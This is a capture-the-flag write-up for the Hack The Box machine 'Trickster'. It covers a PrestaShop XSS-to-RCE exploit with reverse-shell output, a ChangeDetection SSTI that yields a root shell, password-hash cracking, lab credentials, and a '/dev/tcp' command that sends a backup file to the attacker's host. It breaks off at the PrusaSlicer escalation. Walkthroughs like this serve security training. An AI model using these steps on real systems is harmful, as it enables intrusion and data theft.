Trickster is a medium-difficulty machine from Hack The Box dealing initially with CVE-2024-34716 which is a PrestaShop XSS to RCE exploit; later extracting some database creds to be able to exploit the internally deployed ChangeDetection instance through CVE-2024-32651 to land a root shell on the docker container. Then, weโll extract some of the instance backups where weโll find another userโs password which will lead us to exploiting a PrusaSlicer Arbitrary Code Execution to get root.
Trickster-info-card
Reconnaissance
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
PS C:\Users\0xkujen> nmap -A-Pn10.129.46.156 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-0108:31 W. Central Africa Standard Time Nmap scan report for10.129.46.156 Host is up (0.11s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2568c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA) |_ 25690:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: Did not follow redirect to http://trickster.htb/ |_http-server-header: Apache/2.4.52 (Ubuntu) Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in33.44 seconds
We can see that we have our casual ssh 22 port open alongside with a web app on port 80 thatโs redirecting us to trickster.htb, so letโs go ahead and add that entry to our /etc/hosts file.
Now in order for us to look at an exploit, weโve got to uncover what the .git directory has hidden for us. You can download that directory using the Git-Dumper tool.
One interesting dumped directory was admin634ewutrx1jgitlooaj, we navigate to it on our browser and we get the version: Shop Web App
CVE-2024-34716 - XSS to RCE
CVE-2024-34716 is a cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administratorโs right.
PS C:\Users\0xkujen\Desktop\HackThebox\HTB_Machines\Trickster\CVE-2024-34716-new> python3 .\exploit.py --url http://shop.trickster.htb --email[email protected]--local-ip10.10.x.x --admin-path admin634ewutrx1jgitlooaj [X] Starting exploit with: Url: http://shop.trickster.htb Email: [email protected] Local IP: 10.10.x.x Admin Path: admin634ewutrx1jgitlooaj [X] Ncat is now listening on port 12345. Press Ctrl+C to terminate. Serving at http.Server on port 5000 Ncat: Version 7.95 ( https://nmap.org/ncat ) Ncat: Listening on [::]:12345 Ncat: Listening on 0.0.0.0:12345 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1 Response: 200 - 10.129.46.156 - - [01/Feb/202509:26:50] "GET /ps_next_8_theme_malicious.zip HTTP/1.1"200 - GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403 Ncat: Connection from 10.129.46.156:33956. id Linux trickster 5.15.0-121-generic#131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 08:36:24 up 58 min, 0 users, load average: 0.11, 0.16, 0.16 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ uid=33(www-data) gid=33(www-data) groups=33(www-data) $
And we are in!
As usual, the first thing to do is to look for database credentials:
www-data@trickster:/$ mysql -u ps_user -pprest@shop_o mysql -u ps_user -pprest@shop_o Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 1649 Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [(none)]> use prestashop; use prestashop; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
With a simple johntheripper command we can get our password:
1 2 3 4 5 6 7 8 9 10 11 12 13
โโโ(kaliใฟkali)-[~/hackthebox/trickster] โโ$ john --wordlist=/home/kali/Desktop/rockyou.txt hash 130 โจฏ Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 16 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status alwaysandforever (?) 1g 0:00:00:02 DONE (2024-09-21 18:47) 0.3401g/s 12600p/s 12600c/s 12600C/s baloon..alex4ever Use the "--show" option to display all of the cracked passwords reliably Session completed โโโ(kaliใฟkali)-[~/hackthebox/trickster] โโ$
Letโs now get our user flag:
1 2 3 4 5 6 7 8 9 10 11
PS C:\Users\0xkujen> ssh [email protected] The authenticity of host 'trickster.htb (10.129.46.156)' can't be established. ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'trickster.htb' (ED25519) to the list of known hosts. [email protected]'s password: Last login: Thu Sep 26 11:13:01 2024 from 10.10.14.41 james@trickster:~$ cat user.txt a52e7e89c3d548****************** james@trickster:~$
Privilege Escalation - ChangeDetection SSTI
First, I can use fscan which is a comprehensive intranet scanning tool to scan for open ports (since we found a docker interface on the machine): Running ./fscan -h 172.17.0.1/24 we find that the actual IP is 172.17.0.2, now we scan for open ports:
And we got port 5000, so letโs forward that to our machine: ChangeDetection We can simply use jamesโ password to login:
ChangeDetection Changedetection tracks changes on websites and notifies users of updates. Certain versions are vulnerable to SSTI, like the one we have on our hands. We can find a good PoC here Just launch a web server, create a new website as detailed below, and then insert your SSTI script in the notification body and gets://10.10.x.x in the notification URL: ChangeDetection
PS C:\Users\0xkujen> nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.46.181] 53754 # id id uid=0(root) gid=0(root) groups=0(root) #
Under /datastore/Backups we find a couple changedetection backups:
1 2 3 4 5 6 7 8
# ls ls changedetection-backup-20240830194841.zip changedetection-backup-20240830202524.zip # pwd pwd /datastore/Backups #
Letโs get them on our machine. We can do it by running cat changedetection-backup-20240830194841.zip > /dev/tcp/10.10.x.x/9002 on the victim machine and nc -lvnp 9002 > changedetection.zip on our machine.
Doing this first game me a corrupt file, so the way is to transfer the files first to jamesโ session and then to our machine. We can find a couple of interesting files, one of which is a brotli compressed file:
1 2 3 4
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 8/31/2024 12:47 AM 2605 f04f0732f120c0cc84a993ad99decb2c.txt.br -a---- 8/31/2024 12:47 AM 51 history.txt
We can run the command brotli -d filename.br and we can get the password for adam user adam_admin992:
1 2 3
adam@trickster:~$ id uid=1002(adam) gid=1002(adam) groups=1002(adam) adam@trickster:~$
Pivoting to root - prusaslicer abuse
Now checking what we can execute as root:
1 2 3 4 5 6
adam@trickster:~$ sudo -l Matching Defaults entries for adam on trickster: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User adam may run the following commands on trickster: (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
PrusaSlicer takes 3D models (STL, OBJ, AMF) and converts them into G-code instructions for FFF printers or PNG layers for mSLA 3D printers.